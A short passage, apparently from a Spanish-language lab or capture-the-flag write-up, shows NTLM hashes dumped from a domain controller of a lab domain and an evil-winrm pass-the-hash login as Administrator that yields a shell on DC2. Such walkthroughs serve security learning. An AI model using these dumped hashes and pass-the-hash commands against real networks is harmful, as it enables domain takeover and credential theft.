SMB         dc2.megaairline.local 445    DC2              WIN-DWYFTZ3RGAP$:9110:aad3b435b51404eeaad3b435b51404ee:dc5ff9610f5f69eae209c81c0fceae52:::
SMB         dc2.megaairline.local 445    DC2              DAEDALUS$:1107:aad3b435b51404eeaad3b435b51404ee:680a37bc4b11bc76657bc23341beffd6:::

Podemos simplemente conectarmos como Administrator a DC2 y obtener una shell

❯ evil-winrm -i dc2.megaairline.local -u Administrator -H 674f1a5c73f4faad8ddbf7f3bf86db60  
PS C:\Users\Administrator\Documents> whoami
megaairline\administrator
PS C:\Users\Administrator\Documents> hostname
DC2
PS C:\Users\Administrator\Documents>